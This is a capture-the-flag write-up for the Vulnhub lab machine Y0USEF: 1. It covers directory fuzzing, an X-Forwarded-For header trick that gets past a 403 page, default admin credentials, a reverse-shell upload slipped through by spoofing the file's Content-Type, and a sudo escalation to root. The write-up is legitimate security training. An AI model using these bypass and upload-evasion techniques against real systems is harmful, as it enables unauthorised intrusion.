Vulnhub - Y0USEF: 1

Introduction

Get two flag
Difficulty : easy

This is Y0USEF: 1 from Vulnhub. I’ve been so fricking busy lately.

Ports

SSH and HTTP only.

HTTP

The front page just says it’s under construction so it’s off fuzzing we must go. The directory we want is mis-spelled - I assume deliberately - but the mis-spelling does appear in one of our wordlists:

ffuf -u http://192.168.1.163/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt

So yes we want:

http://y0usef/adminstration

Once we get there, we find a few subdirectories but nothing useful. The main directory greets us with:

Forbidden
You don’t have permission to access on this folder

Maybe I’m dumb but it feels like it took me a long time to figure this out. In order to defeat this 403 forbidden, we need an extra header:

X-Forwarded-For: 127.0.0.1

With this, we get access to a login panel.

Login

User creds of admin:admin anyone? Sure, why not. We need to upload a reverse shell but PHP files are rejected. Double extensions and null bytes don’t work; with reference to this I just ended up using Burp Suite Repeater and setting:

Content-Type: image/png

This was enough to get the shell up, and then I could catch my listener and I was away.

Privesc

After the initial hurdles this was a cakewalk. I found a user.txt in /home/yousef that looked a bit suspicious:

c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

This decodes to:

ssh :
user : yousef
pass : yousef123

We can SSH in and it turns out yousef is a sudoer, so it’s just sudo su.

yousef@yousef-VirtualBox:~$ sudo -l
[sudo] password for yousef: 
Matching Defaults entries for yousef on yousef-VirtualBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User yousef may run the following commands on yousef-VirtualBox:
    (ALL : ALL) ALL
yousef@yousef-VirtualBox:~$ sudo su
root@yousef-VirtualBox:/home/yousef# cd /root
root@yousef-VirtualBox:~# ls -lash
total 24K
4.0K drwx------  2 root root 4.0K Dec  8 01:22 .
4.0K drwxr-xr-x 22 root root 4.0K Nov 25 16:41 ..
4.0K -rw-------  1 root root  235 Dec  8 01:57 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
4.0K -rw-r--r--  1 root root  140 Feb 20  2014 .profile
4.0K -rw-r--r--  1 root root  105 Dec  8 01:32 root.txt
root@yousef-VirtualBox:~# cat root.txt
WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx
root@yousef-VirtualBox:~# echo 'WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx' | base64 -d
You've got the root Congratulations any feedback content me twitter @y0usef_11

And now it’s bedtime.